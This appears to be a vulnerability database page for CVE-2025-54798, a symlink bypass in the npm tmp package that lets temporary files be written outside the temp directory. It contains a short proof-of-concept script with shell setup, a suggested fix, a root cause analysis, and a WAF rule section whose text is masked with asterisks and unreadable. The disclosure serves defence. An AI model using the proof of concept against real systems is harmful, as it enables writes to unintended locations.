2.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-54798

GHSA ID

GHSA-52f5-9888-hmc6

EPSS Score

CWE

CWE-59

Published

8/6/2025

Updated

8/6/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-54798

CVE-2025-54798: tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter

Summary

tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.

Details

According to the documentation there are some conditions that must be held:

// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50

Other breaking changes, i.e.

- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks

are still in place.

In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.


// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
     absolute paths are fine as long as they point to a location under the system's default temporary directory.
     Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, 
     as tmp will not check the availability of the path, nor will it establish the requested path for you.

Related issue: https://github.com/raszi/node-tmp/issues/207.

The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}

If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<--- 
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}

PoC

The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible. Tested on a Linux machine.

Setup: create a symbolic link inside the tmpDir that points to a directory outside of it

mkdir $HOME/mydir1

ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir

check the folder is empty:

ls -lha $HOME/mydir1 | grep "tmp-"

run the poc

node main.js
File:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".

the temporary file is created under $HOME/mydir1 (outside the tmpDir):

ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user    0 Apr  X XX:XX tmp-[random-id]

main.js

// npm i tmp@0.2.3

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.

function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}

Impact

Arbitrary temporary file / directory write via symlink

(GitHub Advisory)

2.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-54798

GHSA ID

GHSA-52f5-9888-hmc6

EPSS Score

CWE

CWE-59

Published

8/6/2025

Updated

8/6/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
tmp	npm	<= 0.2.3	0.2.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability exists because the tmp library did not correctly handle symbolic links when validating user-provided directory paths. The root cause is in the _resolvePath function, which used path.resolve instead of a function that resolves symbolic links, like fs.realpathSync. This allowed an attacker to specify a dir option that is a symbolic link pointing to a location outside of the intended temporary directory, bypassing the security checks in _assertIsRelative.

The exploitation of this vulnerability occurs through user-facing functions like fileSync, dirSync, and their asynchronous counterparts (file, dir), which all rely on the flawed path validation logic. The provided patch addresses the issue by removing the vulnerable _resolvePath and _assertIsRelative functions and replacing them with new logic (_resolvePathSync, _getRelativePathSync) that correctly resolves symbolic links using fs.realpathSync before performing the validation checks. Therefore, any function that creates temporary files or directories using a user-supplied dir option was vulnerable.

Vulnerable functions

_resolvePath

lib/tmp.js

This function is the core of the vulnerability. It attempts to resolve a path to ensure it's within the temporary directory, but it uses `path.resolve`, which does not resolve symbolic links. An attacker can provide a `dir` option that is a symlink to a directory outside of the temporary directory, thus bypassing the check and allowing file creation in an arbitrary location. The function was entirely removed and replaced with a new implementation that uses `fs.realpathSync`.

_assertIsRelative

lib/tmp.js

This function uses the vulnerable `_resolvePath` function to check if the `dir` or `template` options are relative to the system's temporary directory. Because `_resolvePath` can be bypassed using a symbolic link, this check is ineffective, making `_assertIsRelative` a key component of the vulnerability. This function was removed in the patch.

tmpNameSync

lib/tmp.js

This synchronous function is one of the main entry points for the vulnerability. It calls `_assertAndSanitizeOptions`, which in turn uses the vulnerable path resolution logic. An attacker calling `tmpNameSync` (or a function that uses it, like `fileSync`) with a malicious `dir` option would trigger the vulnerability. The patch replaces the call to the old, vulnerable sanitization function with a new, secure one (`_assertAndSanitizeOptionsSync`).

fileSync

lib/tmp.js

As demonstrated in the Proof of Concept, `fileSync` is a user-facing function that can be used to exploit this vulnerability. It internally calls `tmpNameSync` to generate a temporary file path, which triggers the vulnerable path resolution and validation logic. Any runtime profile of the exploit would likely show `fileSync` in the call stack.

dirSync

lib/tmp.js

Similar to `fileSync`, `dirSync` is another user-facing function that uses the vulnerable `tmpNameSync` function. It can be used to create a temporary directory in an arbitrary location by exploiting the symbolic link vulnerability in the `dir` option.

WAF Protection Rules

WAF Rule

### Summ*ry `tmp@*.*.*` is vuln*r**l* to *n *r*itr*ry t*mpor*ry *il* / *ir**tory writ* vi* sym*oli* link `*ir` p*r*m*t*r. ### **t*ils ***or*in* to t** *o*um*nt*tion t**r* *r* som* *on*itions t**t must ** **l*: ``` // *ttps://*it*u*.*om/r*szi/no*

Reasoning

T** vuln*r**ility *xists ****us* t** `tmp` li*r*ry *i* not *orr**tly **n*l* sym*oli* links w**n v*li**tin* us*r-provi*** *ir**tory p*t*s. T** root **us* is in t** `_r*solv*P*t*` *un*tion, w*i** us** `p*t*.r*solv*` inst*** o* * *un*tion t**t r*solv*s

2.5

Basic Information

Concerned about an active attack path?

CVE-2025-54798: tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter

Summary

Details

PoC

Impact

2.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI